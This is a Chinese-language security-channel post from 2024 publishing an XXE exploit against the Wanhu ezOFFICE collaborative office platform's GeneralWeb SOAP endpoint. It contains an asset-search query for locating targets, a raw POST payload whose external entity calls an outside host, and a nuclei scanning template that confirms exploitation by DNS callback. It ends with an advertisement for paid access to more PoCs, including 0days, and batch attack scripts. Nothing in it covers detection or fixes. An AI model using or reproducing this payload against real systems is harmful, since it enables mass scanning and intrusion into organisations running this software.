漏洞推送|某户协同办公平台GeneralWeb_XXE漏洞
漏洞推送|某户协同办公平台GeneralWeb_XXE漏洞
小白菜安全 2024-10-11 21:08
漏洞描述
万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户协同办公平台ezoffice GeneralWeb存在xxe漏洞。
资产信息
hunter:app.name=”万户 Ezoffice OA”
漏洞复现
dnslog
POC
POST /defaultroot/xfservices/./GeneralWeb HTTP/1.1
Host:
User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Connection: close
Content-Length: 453
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Accept-Encoding: gzip, deflate, br
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb">
<soapenv:Body>
<gen:OAManager>
<gen:input>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY x SYSTEM "http://xxxx.com">]>
<root>&x;</root>
</gen:input>
</gen:OAManager>
</soapenv:Body>
</soapenv:Envelope>
nuclei
id: wanhu-GeneralWeb-XXE
info:
name: 万户协同办公平台GeneralWeb_XXE漏洞
author: 小白菜
severity: critical
description: |
metadata:
fofa-query:
reference:
- https://
tags: auto
http:
- raw:
- |
POST /defaultroot/xfservices/./GeneralWeb HTTP/1.1
Host: {{Hostname}}
User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 457
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb">
<soapenv:Body>
<gen:OAManager>
<gen:input>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY x SYSTEM "http://{{interactsh-url}}">]>
<root>&x;</root>
</gen:input>
</gen:OAManager>
</soapenv:Body>
</soapenv:Envelope>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
更多漏洞poc(包括0day漏洞)、安全工具、批量脚本加入内部圈子获取,目前只要49,无理由3天退款,加入圈子请扫描下方二维码。
漏洞文库:
工具收集:
脚本文库:
免责声明
该公众号主要是分享互联网上公开的一些漏洞poc和工具,
利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如果本公众号分享导致的侵权行为请告知,我们会立即删除并道歉。